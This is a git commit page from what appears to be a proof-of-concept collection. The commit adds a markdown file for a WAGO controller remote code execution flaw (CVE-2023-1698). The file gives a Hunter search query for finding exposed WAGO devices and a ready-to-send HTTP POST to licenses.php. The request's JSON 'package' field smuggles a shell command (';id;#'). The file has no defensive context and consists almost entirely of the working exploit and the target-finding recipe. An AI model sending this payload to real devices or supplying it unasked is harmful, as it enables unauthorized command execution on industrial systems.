admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create WAGO系统远程代码执行漏洞(CVE-2023-1698).md

Browse Source
This commit is contained in:
wy876 2024-02-18 15:10:36 +08:00 committed by GitHub
parent c484e84b7c
commit f771b94dc4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
WAGO系统远程代码执行漏洞(CVE-2023-1698).md Normal file
View File

@ -0,0 +1,19 @@
## WAGO系统远程代码执行漏洞(CVE-2023-1698)
## 鹰图 hunter
```
web.similar_icon=="10798453453671307224"
```
## poc
```
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
Host: 127.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
{"package":";id;#"}
```
![image](https://github.com/wy876/POC/assets/139549762/4fc4fd00-bde1-4852-b6bc-b2c9a5a0256d)